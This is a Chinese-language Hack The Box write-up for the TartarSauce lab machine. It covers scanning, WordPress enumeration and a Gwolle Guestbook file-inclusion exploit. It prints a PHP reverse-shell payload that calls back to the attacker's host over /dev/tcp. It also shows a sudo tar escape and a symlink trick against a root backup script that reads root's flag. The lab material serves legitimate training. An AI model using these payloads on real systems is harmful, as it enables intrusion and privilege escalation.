靶场信息
靶场类型
信息收集
Nmap
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 10000 10.10.10.88
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-11 20:30 CST
Warning: 10.10.10.88 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.88
Host is up (0.095s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-title: Landing Page
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=2/11%OT=80%CT=1%CU=43534%PV=Y%DS=2%DC=T%G=Y%TM=63E78A9
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=A)SEQ
OS:(SP=108%GCD=1%ISR=10D%TI=Z%II=I%TS=A)OPS(O1=M537ST11NW7%O2=M537ST11NW7%O
OS:3=M537NNT11NW7%O4=M537ST11NW7%O5=M537ST11NW7%O6=M537ST11)WIN(W1=7120%W2=
OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M537NNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
TRACEROUTE (using port 256/tcp)
HOP RTT ADDRESS
1 117.74 ms 10.10.16.1
2 74.70 ms 10.10.10.88
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.31 seconds
Http
这什么玩意儿,虽然知道是字符组成的图案,但是我确实看不出来是啥
<!--Carry on, nothing to see here :D-->
源代码拉到最底下,有一句这里没什么好看的,挺皮的
/webservices/tar/tar/source/
/webservices/monstra-3.0.4/
/webservices/easy-file-uploader/
/webservices/developmental/
/webservices/phpmyadmin/
在 nmap 扫描的时候,有几个目录,挨个去看一下
http://10.10.10.88/webservices/monstra-3.0.4/ 然后只有这一个地址可以访问
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit monstra 3.0.4
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Monstra CMS 3.0.4 - (Authenticated) Arbitrary File Upload / Remote Code Execution | php/webapps/43348.txt
Monstra CMS 3.0.4 - Arbitrary Folder Deletion | php/webapps/44512.txt
Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload | php/webapps/48479.txt
Monstra cms 3.0.4 - Persitent Cross-Site Scripting | php/webapps/44502.txt
Monstra CMS 3.0.4 - Remote Code Execution (Authenticated) | php/webapps/49949.py
Monstra CMS < 3.0.4 - Cross-Site Scripting (1) | php/webapps/44855.py
Monstra CMS < 3.0.4 - Cross-Site Scripting (2) | php/webapps/44646.txt
Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking) | php/webapps/45164.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
这个版本的 Monstra CMS 确实是可以搜索到漏洞,这个先不急着看
点击首页的登录,可以进入登录页面
弱口令 admin/admin 成功登录
根据我们找到的几个漏洞,其中一个为文件上传,我 exploit 利用没成功,我去手动试试
点击 Dashboard -> upload file -> select file -> upload
这里利用没有成功,我又琢磨了一阵,发现是个兔子洞
Fuzz
┌──(root㉿kali)-[~/Desktop]
└─# ffuf -u "http://10.10.10.88/webservices/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 200
/'___ /'___ /'___
/ __/ / __/ __ __ / __/
,__\ ,__/ / ,__
_/ _/ _ _/
_ _ ____/ _
/_/ /_/ /___/ /_/
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.10.88/webservices/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
wp [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 93ms]
[Status: 403, Size: 298, Words: 22, Lines: 12, Duration: 75ms]
:: Progress: [30000/30000] :: Job [1/1] :: 219 req/sec :: Duration: [0:00:26] :: Errors: 2 ::
这里发现有个 wp
但是没有页面
尝试访问 http://10.10.10.88/webservices/wp/wp-admin/ 的时候,跳转到了 tartarsauce.htb ,去加入一个 hosts 解析
echo 10.10.10.88 tartarsauce.htb >> /etc/hosts
然后再访问就有页面了,咱们去访问一下 wp-admin 页面
成功找到后台,这个时候去使用 wpscan 扫描一下
Wpscan
┌──(root㉿kali)-[~/Desktop]
└─# wpscan --url http://10.10.10.88/webservices/wp/ --enumerate p --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
/ / __ / ____|
/ / /| |__) | (___ ___ __ _ _ __ ®
/ / / | ___/ ___ / __|/ _` | '_
/ / | | ____) | (__| (_| | | | |
/ / |_| |_____/ ___|__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.10.88/webservices/wp/ [10.10.10.88]
[+] Started: Sat Feb 11 21:10:03 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.10.88/webservices/wp/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.10.88/webservices/wp/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.10.88/webservices/wp/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.9.4 identified (Insecure, released on 2018-02-06).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.10.88/webservices/wp/, Match: 'wp-includes/js/wp-emoji-release.min.js?ver=4.9.4'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.10.88/webservices/wp/, Match: 'WordPress 4.9.4'
[i] The main theme could not be detected.
[+] Enumerating Most Popular Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:00:50 <=================================================================================================================================> (1500 / 1500) 100.00% Time: 00:00:50
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/
| Last Updated: 2022-12-01T17:18:00.000Z
| Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.0.2
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/, status: 200
|
| Version: 4.0.3 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
[+] gwolle-gb
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
| Last Updated: 2023-01-24T11:28:00.000Z
| Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
| [!] The version is out of date, the latest version is 4.5.0
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/, status: 200
|
| Version: 2.3.10 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Feb 11 21:10:56 2023
[+] Requests Done: 1511
[+] Cached Requests: 31
[+] Data Sent: 449.789 KB
[+] Data Received: 272.615 KB
[+] Memory used: 194.531 MB
[+] Elapsed time: 00:00:53
可以得知 wordpress 版本是 4.9.,并且有一个 Gwolle 插件,切在插件的 readme 页面中有说明版本号为 1.5.3
https://www.exploit-db.com/exploits/38861
根据描述,找到了一个漏洞
漏洞利用
根据漏洞中的描述,我们来构造一下 exploit
http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]
curl -s http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.6/
上面是我们之后要运行的内容
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.6/4444 0>&1'") ?>
上面是我们的 exploit 请求的 shell 文件的内容,文件名字为 wp-load.php
┌──(root㉿kali)-[~/Desktop]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
接着使用 python3 运行一个 http 服务器
nc -nvlp 4444
接着使用 nc 监听一个端口
最后去执行我们的 exploit
┌──(root㉿kali)-[~/Desktop]
└─# rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.88] 33670
bash: cannot set terminal process group (1261): Inappropriate ioctl for device
bash: no job control in this shell
</wp/wp-content/plugins/gwolle-gb/frontend/captcha$ whoami&&id
whoami&&id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
成功返回 shell
权限提升
User
</wp/wp-content/plugins/gwolle-gb/frontend/captcha$ sudo -l
sudo -l
Matching Defaults entries for www-data on TartarSauce:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar
使用 sudo -l 可以看到,我们可以使用 onuma 权限执行 /bin/tar
https://gtfobins.github.io/gtfobins/tar/
sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
whoami&&id
onuma
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
成功提权到 user 权限
cat user.txt
140682a65dccf6fbd674edb57692ae4c
成功拿到 user 权限的 flag 文件
Root
2023/02/11 08:40:29 CMD: UID=0 PID=3580 | /bin/bash /usr/sbin/backuperer
运行 pspy 可以看到,会定时以 root 权限执行 /usr/sbin/backuperer 这个文件,去查看一下
file /usr/sbin/backuperer
/usr/sbin/backuperer: Bourne-Again shell script, UTF-8 Unicode text executable
cat /usr/sbin/backuperer
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{
for n in $(seq 72);
do /usr/bin/printf $"-";
done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdrnAuto backup backuperer backup last ran at : $(/bin/date)n$bdrn" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdrnIntegrity Check Error in backup last ran : $(/bin/date)n$bdrn$tmpfilen" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
脚本分析
生成工作目录和随机临时文件名
打印标题
生成测试消息
清理
将用户上下文更改为 onuma 并将 /var/www/html 备份到临时文件中
睡 30 秒
创建用于完整性检查的目录
unatar 新建文件到check目录
执行 diff 以检查存档和文件系统之间的差异
如果没有差异清理并保存新创建的存档,备份旧的
否则将所有差异记录到日志文件
利用
使用 www-data 用户在 /var/www/html 下创建空文件
</wp/wp-content/plugins/gwolle-gb/frontend/captcha$ cd /var/www/html
cd /var/www/html
www-data@TartarSauce:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@TartarSauce:/var/www/html$ touch 1
touch 1
使用 onuma 用户在 /var/tmp 下创建 var/www/html/ 结构,将 /root/root.txt 链接到 1
cd /var/tmp
pwd
/var/tmp
id
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
mkdir -p var/www/html
cd var/www/html
ln -s /root/root.txt 1
ls -la
total 8
drwxr-xr-x 2 onuma onuma 4096 Feb 11 09:06 .
drwxr-xr-x 3 onuma onuma 4096 Feb 11 09:05 ..
lrwxrwxrwx 1 onuma onuma 14 Feb 11 09:06 1 -> /root/root.txt
在 /var/tmp 中创建 tar 存档
cd /var/tmp
/bin/tar -zcvf a.tgz var/www/html
var/www/html/
var/www/html/1
等待脚本执行,并在 30 秒内将 a.tgz 复制到临时存档
ls -la
total 112
drwxrwxrwt 11 root root 4096 Feb 11 09:10 .
drwxr-xr-x 14 root root 4096 May 12 2022 ..
-rw-r--r-- 1 onuma onuma 65536 Feb 11 09:10 .816e92e4f61e2b8dce68f5779ed42ad70a562348
-rw-r--r-- 1 onuma onuma 154 Feb 11 09:08 a.tgz
drwxr-xr-x 3 onuma onuma 4096 Feb 11 09:05 var
cp a.tgz .816e92e4f61e2b8dce68f5779ed42ad70a562348
等待检查完成
检查 /var/backups 下的日志文件 onuma_backup_error.txt,因为它将包含来自 /var/www/html 和 a.tgz 存档的文件之间的查意,即 /root/root.txt 的内容
cat /var/backups/onuma_backup_error.txt
...
------------------------------------------------------------------------
Integrity Check Error in backup last ran : Thu Jan 21 05:38:54 EST 2021
------------------------------------------------------------------------
/var/tmp/.379fe8e77f9f84a66b9a6df9a452d10499713829
Binary files /var/www/html/webservices/wp/.wp-config.php.swp and /var/tmp/check/var/www/html/webservices/wp/.wp-config.php.swp differ
------------------------------------------------------------------------
Integrity Check Error in backup last ran : Sat Feb 11 09:11:14 EST 2023
------------------------------------------------------------------------
/var/tmp/.816e92e4f61e2b8dce68f5779ed42ad70a562348
diff -r /var/www/html/1 /var/tmp/check/var/www/html/1
0a1
> 2066572c29f0ffd2a77ee5e5c2e77703
成功拿到 root 权限的 flag 文件
原文始发于微信公众号(路西菲尔的故事汇):Hackthebox - TartarSauce 靶场实战
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论